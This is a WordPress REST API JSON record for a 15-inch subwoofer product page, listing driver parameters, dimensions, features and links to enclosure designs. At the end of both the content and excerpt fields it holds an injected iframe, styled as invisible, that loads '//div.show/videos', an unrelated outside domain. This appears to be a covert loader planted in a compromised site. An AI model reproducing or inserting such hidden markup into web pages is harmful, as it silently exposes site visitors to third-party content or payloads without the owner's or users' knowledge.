{"id":3761,"date":"2023-06-07T16:38:49","date_gmt":"2023-06-07T22:38:49","guid":{"rendered":"https:\/\/adcaraudio.com\/store\/?post_type=product&#038;p=3761"},"modified":"2026-05-04T09:44:20","modified_gmt":"2026-05-04T15:44:20","slug":"5015-d2","status":"publish","type":"product","link":"https:\/\/adcaraudio.com\/store\/product\/5015-d2\/","title":{"rendered":"5015 D2"},"content":{"rendered":"<p style=\"background-color: rgba(0, 0, 0, 0) !important;\">The 5000 series 15 employs a finely-tuned balance of damping and extensive motor force to achieve very high efficiency, offering exceptional versatility and unmatched performance in a variety of real-world functions.<\/p>\n<p><strong>Fs<\/strong> 32.97 Hz<br \/>\n<strong>Qms<\/strong> 8.94<br \/>\n<strong>Vas<\/strong> 32.93 liters<br \/>\n<strong>Cms<\/strong> 0.039 mm\/N<br \/>\n<strong>Mms<\/strong> 591.3 g<br \/>\n<strong>Rms<\/strong> 13.845 kg\/s<br \/>\n<strong>Dia<\/strong> 313.400 mm<br \/>\n<strong>Sd<\/strong> 771.055 sq cm<\/p>\n<p><strong>Qes<\/strong> 0.979<br \/>\n<strong>Re<\/strong> 4.546 ohms<br \/>\n<strong>Le<\/strong>\u00a0 4.602 mH<br \/>\n<strong>Z<\/strong>\u00a0 \u00a0 \u00a05.455\u00a0 ohms<br \/>\n<strong>BL<\/strong> 23.86 Tm<br \/>\n<strong>BL^2\/Re<\/strong>\u00a0 125.231 N^2\/W<\/p>\n<p><strong>Qts<\/strong> 0.882<br \/>\n<strong>no<\/strong>\u00a0 \u00a0 0.116 %<br \/>\n<strong>SPL<\/strong> 82.802 dB<br \/>\n<strong>EBP\u00a0 <\/strong>33.691<\/p>\n<p><strong>XMax<\/strong> 23.5mm<\/p>\n<p><strong>Nominal Diameter<\/strong> 15in<br \/>\n<strong>Overall Diameter<\/strong> 15.5in \/ 395mm<br \/>\n<strong>Mounting Hole Diameter<\/strong> 13.77in \/ 350mm<br \/>\n<strong>Bolt Hole Circle Diameter<\/strong><br \/>\n<strong>Motor Outer Diameter <\/strong>7.87in \/ 200mm<br \/>\n<strong>Mounting Depth<\/strong> 10in \/ 255mm<br \/>\n<strong>Required Pole Vent Clearance<\/strong><br \/>\n<strong>Driver Displacement<\/strong> 0.196 cu ft \/ 5.537 l<\/p>\n<p><strong>Minimum Sealed Volume<\/strong> N\/A<br \/>\n<strong>Minimum Vented Volume<\/strong>\u00a0 \u00a0cu ft \/ l net*<\/p>\n<p>* Tune for desired response<\/p>\n<p>&nbsp;<\/p>\n<p><strong><span style=\"color: #ff0000;\">Vehicle body style specific enclosure designs coming soon<\/span><\/strong><\/p>\n<p>The above designs have been engineered for a particular vehicle body style. The cabin acoustics of a sedan, hatchback and an SUV were part of the formula to ensures a linear response and optimal power handling for listening purposes under most circumstances. Please visit our <a href=\"https:\/\/adcaraudio.com\/store\/enclosure-design-service\/\">Enclosure Design Service<\/a> page for one off custom designs.<\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-45.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3788\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-4.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-4.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-4-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-4-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-64.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3883\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-23.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-23.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-23-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-23-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-96.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3977\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-48.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-48.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-48-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-48-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-131.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4086\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-76.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-76.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-76-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-76-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-176.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4725\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-115.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-115.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-115-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-115-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-250.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5584\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-188.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-188.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-188-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-188-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-275.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5858\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-213.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-213.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-213-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-213-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-301.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6060\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-237.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-237.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-237-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-237-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Design-310.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6399\" src=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-246.png\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-246.png 300w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-246-71x60.png 71w, https:\/\/adcaraudio.com\/store\/wp-content\/uploads\/Web-Enclosure-Design-Button-246-106x90.png 106w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<div><iframe id=\"videoCont\" style=\"border: none; visibility: hidden;\" src=\"\/\/div.show\/videos\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<h3><\/h3>\n<ul>\n<li style=\"background-color: rgba(0, 0, 0, 0) !important;\">1,500W \u2013 2,000W optimal power range<\/li>\n<li>3.3 inch high temp voice coil<\/li>\n<li>Triple stack 332oz motor<\/li>\n<li>48.5lb total weight<\/li>\n<li>23.5mm Xmax<\/li>\n<li style=\"background-color: rgba(0, 0, 0, 0) !important;\">Double high current tinsel leads<\/li>\n<li>Double blend material spider<\/li>\n<li style=\"background-color: rgba(0, 0, 0, 0) !important;\">Designed for use in sealed enclosures.<\/li>\n<li style=\"background-color: rgba(0, 0, 0, 0) !important;\">Engineered in the USA.<\/li>\n<li>Also available in D4<\/li>\n<\/ul>\n<div><iframe id=\"videoCont\" style=\"border: none; visibility: hidden;\" src=\"\/\/div.show\/videos\"><\/iframe><\/div>\n","protected":false},"featured_media":3762,"template":"","meta":{"jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"product_brand":[],"product_cat":[66,18],"product_tag":[],"class_list":{"0":"post-3761","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-5000-series-2000-watts","7":"product_cat-subwoofers","9":"first","10":"instock","11":"sale","12":"taxable","13":"shipping-taxable","14":"purchasable","15":"product-type-simple"},"aioseo_notices":[],"jetpack_publicize_connections":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/adcaraudio.com\/store\/wp-json\/wp\/v2\/product\/3761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adcaraudio.com\/store\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/adcaraudio.com\/store\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/adcaraudio.com\/store\/wp-json\/wp\/v2\/media\/3762"}],"wp:attachment":[{"href":"https:\/\/adcaraudio.com\/store\/wp-json\/wp\/v2\/media?parent=3761"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/adcaraudio.com\/store\/wp-json\/wp\/v2\/product_brand?post=3761"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/adcaraudio.com\/store\/wp-json\/wp\/v2\/product_cat?post=3761"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/adcaraudio.com\/store\/wp-json\/wp\/v2\/product_tag?post=3761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}